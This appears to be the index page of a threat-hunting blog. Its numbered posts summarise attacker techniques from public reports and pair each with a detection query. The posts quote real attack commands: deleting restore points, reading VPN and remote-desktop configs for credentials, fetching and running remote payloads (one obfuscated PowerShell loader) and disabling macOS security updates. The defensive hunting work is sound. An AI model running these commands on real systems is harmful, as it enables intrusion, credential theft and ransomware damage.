Posts

416. A Curious Case of Inhibit System Recovery

Image
Hello everyone! Ransomware doesn’t always involve particularly interesting techniques, but there are exceptions. Today, we’ll look at a noteworthy example of Inhibit System Recovery (T1490) . Let’s take a closer look at Monkey Ransomware and how it attempts to prevent a compromised system from being recovered. In addition to more common techniques, such as deleting shadow copies and the local Windows Backup catalog, the malware also disables System Restore and removes existing restore points: powershell.exe -Command "Disable-ComputerRestore -Drive C:\" powershell.exe -Command "Get-ComputerRestorePoint | Remove-ComputerRestorePoint -RestorePointType All" These actions are often performed immediately before or alongside the encryption process. However, attackers may also use scripts to disable recovery mechanisms before deploying the ransomware. This creates an interesting detection opportunity: if we can catch these commands before the ransomware is deployed, we may...

415. Threat Actors Abuse IronPython to Deliver Malware

Image
Hello everyone! As you know, threat actors frequently abuse various command and scripting interpreters at different stages of the attack lifecycle. Today, we’ll look at a less common example involving Python (T1059.006) . To develop hunting hypotheses, let’s take a look at Zscaler’s report on SloppyRAT. In particular, we’re interested in the section covering Python. First, the attackers used a renamed copy of curl.exe to download IronPython from GitHub: "C:\Users\[redacted]\AppData\Local\9342371634011778.com" -s -L --tlsv1.2 --ssl-no-revoke -o "C:\Users\[redacted]\AppData\Local\IronPython.3.4.2.pdf" github.com/IronLanguages/ironpython3/releases/download/v3.4.2/IronPython.3.4.2.zip In this case, we can hunt for suspicious IronPython downloads performed with cURL: event_type: "processcreatewin" AND proc_file_originalfilename: "curl.exe" AND cmdline: *ironpython* The attackers then used the downloaded interpreter to deliver CastleLoader, followed ...

414. That's How Threat Actors Abuse Direct Volume Access

Image
Hello everyone! Today, let’s take a look at Direct Volume Access (T1006) - a technique threat actors can use to bypass normal access controls and gain access to files they’re interested in, including those containing credentials. For example, attackers can access Volume Shadow Copies to get around file locks and access protected data. In this case, the threat actors made multiple attempts to dump the Security Account Manager (SAM) and access the NTDS.dit database. They then used vssadmin to create shadow copies of the C:\ and F:\ drives: vssadmin create shadow /for=C: vssadmin create shadow /for=F: While this activity can certainly be legitimate - for example, as part of backup or system administration tasks - the execution of these commands can also be a sign that an attacker is attempting to access files containing sensitive information. This makes activity like this worth hunting for proactively: event_type: "processcreatewin" AND proc_file_path: "vssadmin.exe...

413. Threat Actors Abuse Multiple Services for System Location Discovery

Image
Hello everyone! I hope you remember that collecting information about a compromised system is one of the most valuable stages from a threat hunting perspective. Today, let’s take a look at the following technique:  System Location Discovery (T1614) . Quite often, malware uses various legitimate web services to obtain information about the IP address of a compromised system. In this case, the attackers used several of them, namely: https://ipv4[.]ipleak[.]net/json/ https://get[.]geojs[.]io/v1/ip/geo[.]json https://ipapi[.]co/json/ https://api[.]ipapi[.]is/ https://ipinfo[.]io/json If some of these services are unfamiliar to you, they can serve as the basis for a hunting hypothesis, for example: event_type: "dnsreqwin" AND dns_rname: ("ipv4.ipleak.net" OR "get.geojs.io" OR "ipapi.co" OR "api.ipapi.is" OR "ipinfo.io") See you soon!

412. Threat Actors Abuse Deno to Run Remote JavaScript Payloads

Image
Hello everyone! Today, we’ll talk about JavaScript (T1059.007) and how attackers abuse a legitimate runtime. As part of another ClickFix campaign, the attackers used some pretty interesting techniques. First, they used winget.exe to download and install the Deno runtime. Second, they used Deno to execute a malicious payload from a remote server controlled by the attackers: deno.exe run -A hxxp://webstizkgao[.]com/v020def066f14754be9.js So, it looks like Deno could be a great hunting target: event_type: "processcreatewin" AND proc_file_originalfilename: "deno.exe" AND cmdline: "run" See you soon!

411. Ransomware Actors Control Systems in Safe Mode Using AnyDesk

Image
Hello everyone! As you probably know, the Modify Registry (T1112) technique allows attackers to accomplish a wide range of objectives throughout the attack lifecycle. Today, we’ll take a look at another interesting example. To bypass existing security controls, the ransomware actors - this time Akira (Neon Wolf) - once again took advantage of Windows Safe Mode. But the attackers needed a way to control the compromised system. For this, they used AnyDesk . To ensure that it would be launched even after rebooting into Safe Mode, they made the following registry modification: "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /ve /d Service Since this activity takes place immediately before the ransomware deployment begins, it may be the last opportunity to prevent damage. For example, it is worth monitoring for suspicious modifications to the relevant registry key: event_type: "registryvaluesetwin" AND reg_...

410. Adversaries Want to Be Stealthy, But Make More Noise

Image
Hello everyone! Today, let’s look at an example of how attackers’ attempts to get rid of artifacts can actually add more noise. Moreover, this is a very common example. Our source is a Zscaler report on the new modular remote access trojan Abyssos. Despite being new, the trojan uses a huge number of well-known techniques. For example, as part of implementing the File Deletion technique (T1070.004), the malware executes the following command: cmd.exe /C ping 127.0.0.1 -n 3 >nul & del /F /Q path_to_file Although the malicious file is deleted in this case, the structure of the command is quite distinctive, giving us an opportunity for detection: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("ping" AND "del") Moreover, this is far from the first sample exhibiting a similar behavioral marker, allowing us to detect not only this particular family but many others as well. See you soon!

409. Adversaries Abuse Localhost[.]run for Tunneling

Image
Hello everyone! Tunnels. Attackers are coming up with more and more ways to implement them. Today, we’ll take another look at the Protocol Tunneling technique (T1572) . There are plenty of free tunneling services that allow a local service to be exposed to the internet through a public URL. For example, attackers often use Cloudflare Tunnel. However, according to this report , threat actors also used localhost [.] run . You can detect traces of its use, for example, by monitoring communications with lhr [.] life subdomains: event_type: dnsreq* AND dns_rname: "lhr.life" See you soon!

408. Adversaries Disable Updates for Compromised Systems

Image
Hello everyone! Today we'll look at how threat actors interfere with updates on compromised systems as part of the Disable or Modify Tools (T1685) technique. This time, our focus is on macOS. Let's open the report on XCSSET activity and scroll to the "Impairing Defenses" section. As you can see, the threat actor uses the following commands to disable specific Apple security update mechanisms: defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false The first command disables the delivery of security data updates for XProtect, Gatekeeper, and other Apple security components. The second disables the installation of Rapid Security Responses (RSR). To detect this behavior, we can hunt for modifications to the com.apple.SoftwareUpdate.plist file performed through the defaults utility: event_type: "processcreatemac" ...

407. That's How Paper Werewolf Obtains Credentials

Image
Hello everyone! Attackers are often able to extract authentication material from files, so today we'll take a look at the Credentials In Files (T1552.001) technique. According to Kaspersky's report on the activity of the GOFFEE (Paper Werewolf) cluster, the threat actors showed a strong interest in various configuration files containing sensitive information, including: cmd.exe /c type "%APPDATA%\AnyDesk\service.conf" cmd.exe /c type "%USERPROFILE%\OpenVPN\config\avia\avia.ovpn" cmd.exe /c type "%APPDATA%\Kerio\VpnClient\user.cfg" cmd.exe /c dir "%USERPROFILE%\Downloads\Telegram Desktop" Naturally, this kind of activity creates opportunities for proactive threat hunting. For example: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("type" OR "dir") AND cmdline: ("anydesk" OR "openvpn" OR "vpnclient" OR "telegram desktop") See you so...

406. Threat Actors Embed Malicious HTA into LNK Files

Image
Hello everyone! Today we'll look at the Execution (TA0002) and Stealth (TA0005) tactics, along with different implementations of the PowerShell (T1059.001) , JavaScript (T1059.007) , and Mshta (T1218.005) techniques. Our examples come from this report  on the activity of Kimsuky (also tracked as Monolithic Werewolf). Let's start with the malicious shortcut files distributed by the attackers. Since the malicious code was embedded directly within the LNK file itself, mshta.exe was launched with the shortcut as its argument, giving us a useful detection opportunity: event_type: "processcreatewin" AND proc_file_path: "mshta.exe" AND cmdline: *.lnk The malicious code acted as a dropper that created the following files on the compromised system: %APPDATA%\Microsoft\Windows\Templates\Templates.js %APPDATA%\Microsoft\Windows\Templates\Templates.ps1 The first file was responsible for launching the second. In this case, we can proactively hunt for this activity by...

405. Adversaries Disable Notifications to Maintain Stealth

Image
Hello everyone! It's been a while since we talked about interesting techniques involving Windows Registry modifications. Time to fix that! Today we'll take a look at Cruciferra , a crypter that was analyzed in detail by Proofpoint in a recent report . The malware modifies the following Registry values: ToastEnabled in Software\Microsoft\Windows\CurrentVersion\PushNotifications Balloon in Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowInfoTip in Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced These Registry values control various user notifications. By modifying them, attackers can suppress notifications displayed to the victim, including alerts generated by security software. This gives defenders several additional opportunities to detect potentially malicious activity: event_type: "registryvaluesetwin" AND reg_key_path: ("toastenabled" OR "balloon" OR "showinfotip") See you soon!

404. Qilin’s Data Exfiltration Toolkit Updated

Image
Hello everyone! Today, data exfiltration has become a standard stage in almost every ransomware attack. While threat actors often rely on the same set of tools, there are occasional exceptions. According to an Arctic Wolf Labs report , operators behind the Qilin ransomware used Proton Drive for data exfiltration. Proton Drive is a cloud storage service developed by the Swiss company Proton and designed with privacy in mind. Its key feature is end-to-end encryption, meaning files are encrypted on the user's device before they are uploaded to the cloud. Of course, Proton Drive can be used legitimately within enterprise environments. However, it can also serve as an early indicator of ransomware activity, making it a useful candidate for threat hunting. event_type: "processcreatewin" AND proc_file_productname: "Proton Drive" See you soon!

403. Adversaries Abuse ControlR Agent

Image
Hello everyone! Today we're looking at another example of the Remote Desktop Software technique (T1219.002) . Notably, the remote access tool leveraged by the threat actor is currently not included in the LOLRMM project. According to a report from Seqrite, the ShadowRecruit campaign distributed archive files containing multiple components, including a malicious Windows shortcut (LNK), a PowerShell script, and an executable. Execution of the LNK file resulted in the launch of PowerShell, which, among other actions, downloaded and executed the installer for the legitimate remote access software ControlR. Once installed, ControlR could be abused by the threat actor as either a primary or fallback channel for persistent remote access to the compromised host. One approach to detecting this activity is to identify network communications with ControlR infrastructure: event_type: "dnsreqwin" AND dns_rname: "controlr.app" Another option is to hunt for evidence of Contr...

402. Adversaries Keep Actively Using the EtherHiding Technique

Image
Hello everyone! Threat actors continue to actively use the EtherHiding technique, and today we'll look at another example of it in action. According to a report by LevelBlue , the attackers distributed malicious shortcut (.LNK) files. Interacting with these shortcuts resulted in the execution of an obfuscated PowerShell command, for example: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $Se4n4GmJ=[System.Numerics.BigInteger]\7330349723455890650683895074414054;$fobLzAK0=[System.Numerics.BigInteger]\5070886814366709789648062014091648;$YrXdQd=$Se4n4GmJ - $fobLzAK0;for($bwusN=100+156;$YrXdQd -ne 0;$YrXdQd=$YrXdQd / $bwusN){$JZwuEnBA+=[char]\([int]\($YrXdQd % $bwusN));};iwr $JZwuEnBA -OutFile $env\:TEMP\lFdlPb.ps1 -UseBasicParsing; powershell -ep bypass -File $env\:TEMP\lFdlPb.ps1 Notice that the obfuscation leverages the BigInteger type, which by itself provides an opportunity for hunting: event_type: "processcreatewin" AND proc_file_path: "powe...

401. Threat Actors Abuse Browser Kiosk Mode to Distract Victims

Image
Hello everyone! Today we'll look at another interesting example of how attackers abuse the browser. This time, they used it to distract the victim. According to this report , to distract the user and buy the time needed for their scripts to execute properly, the attackers used the service fakeupdate[.]net , which displays a fake Windows update screen. To do this, the attackers launched Microsoft Edge in kiosk mode: start msedge.exe --kiosk https://fakeupdate[.]net/win10ue --edge-kiosk-type=fullscreen Of course, attackers can host similar pages on their own servers. Nevertheless, this browser launch mode provides an opportunity to hunt for suspicious activity using the following detection logic: event_type: "processcreatewin" AND proc_file_path: "msedge.exe" AND cmdline: ("kiosk" AND "fullscreen") See you soon!

400. Another Threat Actor Started to Use Malicious Browser Extensions

Image
Hello everyone! Today we'll look at a less common persistence technique used on compromised systems: Browser Extensions (T1176.001) . According to this report , the attackers used Microsoft Teams while impersonating IT staff to convince victims to visit a phishing website. These phishing sites delivered malicious scripts written in AutoHotKey, Batch, or PowerShell. The script extracted all components of the malware, including a Python backdoor and a browser extension. It also created a scheduled task that launched Microsoft Edge with the following command-line arguments: --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\User Data\Recovery" --load-extension="%EXTENSION_DIR%" --no-first-run --disable-sync --headless=new As you can see, the attackers specified an alternative user data directory (--user-data-dir) and loaded a malicious browser extension (--load-extension). These command-line arguments can be used to hunt for suspicious activity: event_type: "proce...

399. Threat Actors Abuse Storj to Deliver OXLOADER

Image
Hello everyone! Attackers are increasingly using legitimate web services to host malicious files, and today we'll take a look at another example: Storj. According to this report, the attackers used malvertising to distribute the OXLOADER loader. To host the malicious payloads, they relied on the Storj service, for example: link[.]storjshare[.]io/raw/jwwvr4oskkkjsgevt774ta62ehya/ruslan/aBsvwbdas.exe As with other services of this kind, you can look for suspicious interactions with them using a query like: event_type: "dnsreq" AND dns_rname: "storjshare.io" Or you can simply block access to the service altogether - in that case, users won't be able to download the malicious files. See you soon!

398. SmartRAT - Smart Folders?

Image
Hello everyone!  Let's take a look at another example of how threat actors use interesting folders for masquarading as part of the Match Legitimate Resource Name or Location (T1036.005) technique.  Today's example is SmartRAT . If we look at the report, we'll immediately notice that the malware actively uses the following folders:  %APPDATA%\Microsoft\Diagnosis\ETW\  %ProgramData%\Microsoft\Diagnosis\ETW\  For example, the malware could create a service using the following command: "C:\Windows\system32\sc.exe" create MicrosoftEdgeUpdateCore binPath= "C:\ProgramData\Microsoft\Diagnosis\ETW\MicrosoftEdgeUpdateCore.exe" start= auto obj= LocalSystem DisplayName= "Windows Diagnostics ETW Service"  These are certainly not the most common locations for malware deployment, which makes them good candidates for threat hunting:  event_type: "processcreatewin" AND proc_file_path: "Microsoft\\Diagnosis\\ETW" See you soon!

397. Using Adversaries' Stealth Against Them

Image
Hello everyone! Today we'll talk about stealth and persistence in a compromised system, focusing on the following technique: Hidden Window (T1564.003) . I'm sure that searching for suspicious values in the Run registry key is part of your Threat Hunting routine. But sometimes attackers, while trying to stay hidden, actually help us detect malicious activity. For example, EtherRAT wrote to HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth the following value: "C:\Windows\System32\conhost.exe" --headless "C:\Users\Bruno\AppData\Local\Adobe\Components\e8b3\node-v18.17.0-win-x64\node.exe" "C:\Users\Bruno\AppData\Local\Adobe\Components\e8b3\97f04949151a3819.js" As you can see, the attackers used conhost.exe with the --headless parameter to hide the window. But how often would such a command chain be legitimately written to the Run key? Of course, almost never. That gives us another detection opportunity: event_type: ...